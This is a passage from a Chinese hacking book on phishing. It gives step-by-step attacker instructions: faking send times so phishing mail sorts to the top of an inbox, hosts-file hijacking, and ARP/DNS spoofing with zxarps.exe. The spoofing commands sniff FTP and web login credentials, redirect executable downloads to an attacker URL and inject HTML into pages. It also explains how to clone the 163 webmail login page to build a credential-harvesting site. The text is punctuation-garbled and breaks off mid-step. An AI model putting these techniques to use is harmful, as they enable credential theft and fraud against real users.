反黑风暴-第16部分

快捷操作: 按键盘上方向键 ← 或 → 可快速上下翻页 按键盘上的 Enter 键可回到本书目录页 按键盘上方向键 ↑ 可回到本页顶部! 如果本书没有阅读完，想下次继续接着阅读，可使用上方 "收藏到我的浏览器" 功能 和 "加入书签" 功能！

将显示发送成功的信息。

步骤07与此同时，邮箱79902662@qq。提示收到一封标题为“测试”，发件人为lbwkzceo@163。的邮件。单击提示邮件中的链接，即可打开邮箱79902662@qq。，在其中可查看收到的邮件，正是由于网上有很多像“天天邮件群发工具”这样的工具，可以很方便地发送钓鱼邮件，才导致垃圾邮件越来越猖狂。

7。3。5邮件前置与诱惑性标题

钓鱼者为了增加邮件查看率，使出了浑身解数，比如通过一些技巧使钓鱼邮件处于用户收件箱的最顶端，或使用具有诱惑性的标题，使用户上当等。

1。使钓鱼邮件位于收件箱的最顶端

用户在接收邮件时，邮箱会根据接收的时间对收到的邮件进行排列，不同的邮箱排列的规则不一样。那么，如何让钓鱼邮件处于用户收件箱的最顶端呢？

为了形象地说明，这里列举一个例子，介绍如何使钓鱼邮件处于用户收件箱的最顶端。假设某一用户向邮箱lbwkzceo@163。发送三封邮件，第一次发送邮件时，将系统时间更改为2002年10月1日；第二次发送邮件时，将系统时间更改为2008年1月1日；第三次发送邮件时，将系统时间更改为2005年3月7日。按照邮件正常接收方式，其邮件排序应依次为2002年、2008年、2005年，但163邮箱的邮件排序是按照时间的大小排序的。

因此，收到邮件的顺序为2002年、2005年、2008年。这样，2008年的邮件则排在收件箱的第一位。但这种方法不可以适用于所有邮箱，有兴趣的用户可自己测试一下其他邮箱。

2。使用诱惑性标题

恶意攻击者通过发送大量垃圾邮件，在垃圾邮件的标题中会写有带有诱惑性的词语或欺骗性的说明，在邮件的正文中往往会有大量诱惑性的图片并且加入恶意地址的连接。

当用户浏览垃圾邮件且轻信其中的内容，对恶意图片或超级链接进行点击后，就会跳转到恶意攻击者事先部署好的网站或网页，而这些网站或网页往往是和网上交易、网上购物等网上消费的网站相似。这样，在用户没有很好网上安全防范意识的情况下，就会按照这些虚假的网站或网页进行操作，从而造成个人经济财产的损失。

为了使邮件更具有吸引力，可以在日常生活中多注意一些新闻稿，那些记者为了使自己的新闻稿吸引人们的眼球，常常会在新闻稿上添加一些具有诱惑性的标题。这些诱惑性的标题实正文中的内容也许不相符，但却可以增加点击率。

第四章　网站劫持钓鱼艺术

网站劫持钓鱼技术是钓鱼攻击中高级技术的应用，如DNS劫持，一旦取得目标域名的解析记录控制权，就可以修改此域名的解析结果，将域名原来的IP地址转到攻击者指定的IP地址上。这样，不管是否输入了正确的域名，都会掉进钓鱼者设置的陷阱中。要保护自己免遭劫持，需要先了解劫持钓鱼攻击的过程。

7。4。1Hosts文件的映射劫持

现在很多网站不经过用户同意就将各种各样的插件安装到用户的计算机，这些插件可能有一些是木马或病毒。这些木马或病毒安装到计算机中后，为了对抗安全防护软件，都使用Hosts文件来劫持用户，禁止访问安全站点。

比如，一旦劫持了某个杀毒网站，用户访问的将是陌生站点与病毒站点等。对于这些网站，可以利用Host把该网站的域名映射到错误的IP或本地计算机的IP，这样就不用访问了。在Windows系统中，127。0。0。1为本地计算机的IP地址。

下面先来了解一下Hosts文件的详细内容。

Hosts文件是一个用于存储计算机网络中节点信息的文件，它可以将主机名映射到相应的IP地址，实现DNS的功能，它可以由计算机的用户进行控制。

Hosts文件存储位置在不同的操作系统中并不相同，甚至不同Windows版本的位置也不大一样。一般来说，WindowsXP/2003/Vista/win7系统中Hosts文件的默认位置为C：Windowssystem32driversetc文件夹下，但也可以改变。若钓鱼者想劫持的话，需要先用记事本修改这个文件的内容。Hostname（主机名）的映射关系，是一个映射IP地址和Hostname（主机名）的规定。

这个规定中，要求每段只能包括一个映射关系，也就是一个IP地址和一个与之有映射关系的主机名。IP地址要放在每段的最前面，映射的Hostname（主机名）在IP后面，中间用空格分隔。

钓鱼者的手法就是修改主机与IP地址的映射关系，进行HOSTS文件的映射劫持。下面通过一个简单的例子介绍HOSTS劫持的过程。将网站。hackbase。映射到百度的IP上，这样当打开。hackbase。网站时，实际上是打开了百度网站。具体的操作步骤如下：

步骤01在命令提示符窗口中使用PING命令获得百度的IP地址，在其中输入命令“Ping。baidu。”，即可获得百度的IP地址119。75。218。45。

步骤02打开文件夹“C：Windowssystem32driversetc”，找到其中的Hosts文件。

步骤03在Hosts文件上右键单击，在【Hosts属性】对话框中取消勾选Hosts文件的只读属性。

步骤04单击【确定】按钮，用记事本打开Hosts文件，在内容的最后增加一条记录“119。75。218。45。hackbase。”。

步骤05保存修改后的Hosts文件，再打开网站“//。hackbase。”，即可在其中发现打开的其实是百度网站。

【提示】

在修改HOSTS文件时常遇到保存后无效的情况，这里要提醒注意：在用记事本打开HOSTS文件，在最后一行添加完记录后，一定要按下回车键，否则这一行记录是不生效的。建议大家遵循这样的习惯：IP地址＋空格＋域名＋Enter键。

7。4。2内网中的DNS劫持

DNS是由解析器和域名服务器组成的。域名服务器是指保存有该网络中所有主机的域名和对应IP地址，并具有将域名转换为IP地址功能的服务器。其中域名必须对应一个IP地址，而IP地址不一定有域名。

在Inter上域名与IP地址之间是一对一（或者多对一）的，域名虽然便于人们记忆，但机器之间只能互相认识IP地址，它们之间的转换工作称为域名解析，域名解析需要由专门的域名解析服务器来完成，DNS就是进行域名解析的服务器。DNS命名用于Inter等TCP/IP网络中，通过用户友好的名称查找计算机和服务。

当用户在应用程序中输入DNS名称时，DNS服务可以将此名称解析为与之相关的其他信息，如IP地址。因为，你在上网时输入的网址，是通过域名解析系统解析找到了相对应的IP地址，这样才能上网。其实，域名的最终指向是IP。

DNS欺骗劫持工具有很多，这里用zxarps。exe来演示内网的劫持，使内网中任一用户打开网站。hackbase。都会被劫持到本机。先在CMD命令行下运行命令“zxarps。exe”，即可显示出该命令的各个参数，其含义如下：

Options（参数说明）：

…idx＇index＇网卡索引号

…ip＇ip＇欺骗的IP；用'…'指定范围；'；'隔开

…sethost＇ip＇默认是网关；可以指定别的IP

…port＇port＇关注的端口；用'…'指定范围；'；'隔开；没指定默认关注所有端口

…reset恢复目标机的ARP表

…hostname探测主机时获取主机名信息

…logfilter＇string＇设置保存数据的条件，必须＋…_做前缀；后跟关键字；

'；'隔开关键字；多个条件'｜'隔开

所有带＋前缀的关键字都出现的包则写入文件

带…前缀的关键字出现的包不写入文件

带_前缀的关键字一个符合则写入文件（如有＋…条件也要符合）

…save_a＇filename＇将捕捉到的数据写入文件ACSII模式

…save_h＇filename＇HEX模式

…hacksite＇ip＇指定要插入代码的站点域名或IP；

多个可用'；'隔开；没指定则影响所有站点

…insert＇htmlcode＇指定要插入html代码

…postfix＇string＇关注的后缀名，只关注HTTP/1。1302

…hackURL＇url＇发现关注的后缀名后修改URL到新的URL

…filename＇name＇新URL上有效的资源文件名

…hackdns＇string＇DNS欺骗，只修改UDP的报文；多个可用'；'隔开

格式：域名｜IP，。aa。｜222。22。2。2；。bb。｜1。1。1。1

…Interval＇ms＇定时欺骗的时间间隔，单位：毫秒：默认是3000ms

…spoofmode＇1｜2｜3＇将数据骗发到本机；欺骗对象：1为网关；2为目标机；3为两者（默认）

…speed＇kb＇限制指定的IP或IP段的网络总带宽；单位：KB

example（参数说明）：

嗅探指定的IP段中端口80的数据，并以HEX模式写入文件

zxarps。exe…idx0…ip192。168。0。2…192。168。0。50…port80…save_hsniff。log

FTP嗅探；在21或2121端口中出现USER或PASS的数据包记录到文件

zxarps。exe…idx0…ip192。168。0。2…port21；2121…spoofmode2…logfilter〃_USER；_PASS〃…save_asniff。log

HTTPweb邮箱登陆或一些论坛登陆的嗅探；根据情况自行改关键字

zxarps。exe…idx0…ip192。168。0。2…192。168。0。50…port80…logfilter〃＋POST；＋user；＋pass〃…save_asniff。log

用｜添加嗅探条件；这样FTP和HTTP的一些敏感关键字可以一起嗅探

zxarps。exe…idx0…ip192。168。0。2…port80；21…logfilter〃＋POST；＋user；＋pass｜_USER；_PASS〃…save_asniff。log

如果嗅探到目标下载文件后缀是exe等则更改Location：为//xx。/test。exe

zxarps。exe…idx0…ip192。168。0。2…192。168。0。12；192。168。0。20…192。168。0。30…spoofmode3…postfix〃。exe；。rar；。zip〃…hackurl//xx。/…filenametest。exe

指定的IP段中的用户访问到…hacksite中的网址则只显示justforfun

zxarps。exe…idx0…ip192。168。0。2…192。168。0。99…port80…hacksite222。2。2。2；。a。；。b。…insert〃justforfun〃

指定的IP段中的用户访问的所有网站都插入一个框架代码

zxarps。exe…idx0…ip192。168。0。2…192。168。0。99…port80…insert〃〃

指定的两个IP的总带宽限制到20KB

zxarps。exe…idx0…ip192。168。0。55；192。168。0。66…speed20

DNS欺骗

zxarps。exe…idx0…ip192。168。0。55；192。168。0。66…hackdns

〃。aa。｜222。22。2。2；。bb。｜1。1。1。1〃

再以本机在内网中的IP地址192。168。0。10为例，在CMD命令行下运行DNS劫持的命令：

zxarps。exe–idx0–ip192。168。0。1…192。168。0。255…hackdns。hackbase。｜192。168。0。10

在命令执行成功后，命令行中将显示结果。

接下来需要在本机架设一个WEB服务器，以便将内网中的DNS劫持过来。

第五章　其他网络钓鱼艺术

除了上面介绍的几种网络钓鱼技术外，还有一些钓鱼技术可以让用户更快地了解钓鱼攻击。

如利用“网站整站下载器”工具将网站的相关文件下载到本地，然后将下载的文件上传到FTP空间中，最后再对网页的内容稍加修改，即可伪造出一个与真实网站一模一样的伪冒网站。

7。5。1将163邮箱整站扒下来

攻击者为了保证钓的鱼更多、更有质量，其设定的钓鱼对象是访问量过高的站点及金融交易站点。本节将以163邮箱为例，介绍攻击者如何伪造整个网站，且让人看不出任何破绽。

为了使伪造的网站达到逼真的程度，需要将真实网站的素材下载下来，并将它们改造处理。一般会直接使用IE浏览器来将门户网站文件下载到本地，但这种做法经常会出现错误，因此，这里将介绍一个工具：网站整站下载器。

网站整站下载器可以分析网页中的所有链接（图片链接、脚本与样式表链接等），包括源码以及所有页面，并将网站的内部链接文件下载、分类，也就是说它是一个可以将整个网站下载下来的软件。

下面介绍使用“网站整站下载器”。电子书站文件的方法。

步骤01下载并安装“网站整站下载器TeleportPro…v1。61”，即可进入主窗口中。单击主窗口中工具栏上的【NewProjectwizard】（新计划项目向导）按钮，在弹出的【NewProjectwizard】（新计划项目向导）对话框中对新建的项目进行设置。

【提示】

如果是第一次运行TeleportPro软件，程序会自动出现【NewProjectwizard】（新计划项目向导）对话框，这个向导对话框中的各选项实际是TeleportPro主要功能的体现。

步骤02在对话框中保持默认设置不变，单击【下一步】按钮，即可弹出【StartingAddress】（起始地址）对话框。在地址栏中必须输入要下载的网站文件的地址，否则将被警告无法进入下一步，这里将要下载“//mail。163。”网站。

步骤03单击【下一步】按钮，在弹出的【ProjectConfiguration】（项目设置）对话框中可选择接收指定网站的文件类型，包括文本、图形和声音等，可根据要求选定，这里选择“Everything”（任何文件类型）单选按钮。对于必须持有账号和密码才能进入的网站，必须在下面的“Account”和“Password”文本框中输入正确的账号和密码，否则TeleportPro无法进入此站点下载文件。

步骤04单击【下一步】按钮，在弹出的【Congratulations】（祝贺）对话框中单击【完成】按钮，即可完成新项目向导的创建。

步骤05此时，程序会弹出【SaveAs】（另存为）对话框，在“文件名”文本框中键入后缀为。tpp的项目名，单击【保存】按钮后，即可返回TeleportPro主窗口中。

步骤06在TeleportPro主窗口中单击工具栏上的【Star】（开始）按钮，或选择【Project】→【Start】菜单项，即可开始文件下载操作。

步骤07稍等一会儿后，当“//mail。163。”网站文件下载完毕后，即可将下载的网站文件上传到FTP空间中。

再将其对比一下后，即可发现上传到空间中的虚假163邮箱网站和真实的163邮箱网站一模一样，但地址栏中的地址却不相同。

7。5。2继续完善，让伪造生效

将163邮箱网站整站下载下来后，需要将网页中的内容稍作修改，以免用户打开伪冒网站时出现破绽。

1。修改代码中的外部链接地址

由于使用网站整站下载器下载下来的网站，对于外部的链接它全部都换成了一段脚本代码：javascript：if（confirm…）。用户需要将这段脚本代码去掉，并替换成原来的链接地址。如果没有图片显示，可以手动下载到本地后再修改链接。

2．修改index。html文件中的代码

用记事本打开下载的163邮箱网站首页文件index。html，再将下面这段验证脚本删除：

varati=user。value。indexOf（〃@〃）；

if（ati！=…1）｛

user。value=user。value。substring（0；ati）；

｝

varsecure=fm。remUser。checked？true：false；

varurl=fm。secure。checked？〃https：//reg。163。/logins。jsp〃：〃//reg。163。/login。jsp〃；

url＋=〃？type=1&url=//entry。mail。163。/coremail/fcg/ntesdoor2？〃；

url＋=〃lightweight％3D1％26verifycookie％3D1％26〃；

if（secure）｛

user。autoplete=〃on〃；

｝else｛

user。autoplete=〃off〃；

｝

fGetVersion（fm）；

fm。action=url＋〃language％3D…1％26style％3D〃＋fm。style。value；

visitordata。setVals（＇fm。username。value；fm。style。value；fm。secure。checked？1：0＇；true）；

visitordata。store（）；

再将index。html中的代码：